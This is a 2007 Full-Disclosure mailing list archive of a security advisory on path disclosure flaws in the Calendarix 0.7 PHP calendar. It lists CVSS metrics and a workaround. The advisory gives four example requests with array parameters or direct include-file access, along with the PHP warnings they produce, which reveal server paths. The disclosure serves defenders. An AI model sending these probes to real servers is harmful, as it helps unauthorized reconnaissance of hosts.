[Full-disclosure] Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities

From: "SecurityResearch" <securityresearch@xxxxxxxxxxxxxxxx>
Date: Mon, 25 Jun 2007 09:28:57 -0700

netVigilance Security Advisory #36
Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
Description:
Calendarix is a powerful and easy to use calendar based on PHP and MySQL. It has been developed with ease of use and quick access to information in mind. It provides the user with the quickest possible navigation and accessing the most commonly used functions in the shortest steps.
External References:
Mitre CVE: CVE-2007-3259
NVD NIST: CVE-2007-3259
OSVDB: 35371
Summary:
Calendarix is a powerful and easy to use calendar based on PHP and MySQL.
Security problems in the product allow attackers to gather the true path of the server-side script.
Advisory URL:
http://www.netvigilance.com/advisory0036
Release Date:
06/19/2007

Severity:
Risk: Low

CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.33

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
TC 17968

Vulnerable Systems:
Calendarix version 0.7. 20070307
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.
Vendor:
Vincent Hor (Calendarix Enterprise)
Vendor Status:
Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time.
Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = Off.
Example:
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?month[]=1
REPLY:
Warning: Illegal offset type in [DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php on line 53 
Path Disclosure Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/cal_week.php?op=week&catview[]=1
REPLY:
Warning: preg_match() expects parameter 2 to be string, array given in [DISCLOSED PATH][PRODUCT-DIRECTORY]\cal_header.inc.php on line 91 
Warning: preg_match() expects parameter 2 to be string, array given in [DISCLOSED PATH][PRODUCT-DIRECTORY]\cal_header.inc.php on line 92 
Warning: preg_match() expects parameter 2 to be string, array given in [DISCLOSED PATH][PRODUCT- DIRECTORY]\ cal_header.inc.php on line 93 
...
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [DISCLOSED PATH][PRODUCT-DIRECTORY]\cal_week.php on line 184 
...
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in [DISCLOSED PATH][PRODUCT-DIRECTORY]\cal_week.php on line 186 
Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/yearcal.php?ycyear[]=1
REPLY:
Fatal error: Unsupported operand types in [DISCLOSED PATH][PRODUCT-DIRECTORY]\yearcal.php on line 79 
Path Disclosure Vulnerability 4:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/cal_functions.inc.php
REPLY:
Fatal error: Call to undefined function: translate() in [DISCLOSED PATH][PRODUCT-DIRECTORY]\cal_functions.inc.php on line 17 
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Calendarix version 0.7. 20070307 Multiple XSS Attacks
Next by Date: Re: [Full-disclosure] Office 0day
Previous by thread: [Full-disclosure] Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
Next by thread: [Full-disclosure] Calendarix version 0.7. 20070307 Multiple SQL Injection Vulnerabilities
Index(es):
- Date
- Thread

Relevant Pages

[Full-disclosure] Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
... This vulnerabilities can be exploited only with PHP version < 5.0.0 and MS Windows hosting. ... Calendarix is a powerful and easy to use calendar based on PHP and MySQL. ... Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time. ... Path Disclosure Vulnerability 1: ...
(Full-Disclosure)
Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
... Calendarix is a powerful and easy to use calendar based on PHP and MySQL. ... Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time. ... Path Disclosure Vulnerability 1: ...
(Bugtraq)
Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
... This vulnerabilities can be exploited only with PHP version < 5.0.0 and MS Windows hosting. ... Calendarix is a powerful and easy to use calendar based on PHP and MySQL. ... Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time. ... Path Disclosure Vulnerability 1: ...
(Bugtraq)
[Full-disclosure] MyBB version 1.2.4 Multiple Path Disclosure Vulnerabilities
... MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. ... Contact with the Vendor was established and draft of the security advisory was ... Path Disclosure Vulnerability 1: ...
(Full-Disclosure)
Jetbox CMS version 2.1 Multiple Path Disclosure Vulnerabilities
... Jetbox CMS is seriously tested on usability & has a professional intuitive interface. ... Vendor Status: ... There is no official fix at the release of this Security Advisory ... Path Disclosure Vulnerability 1 ...
(Bugtraq)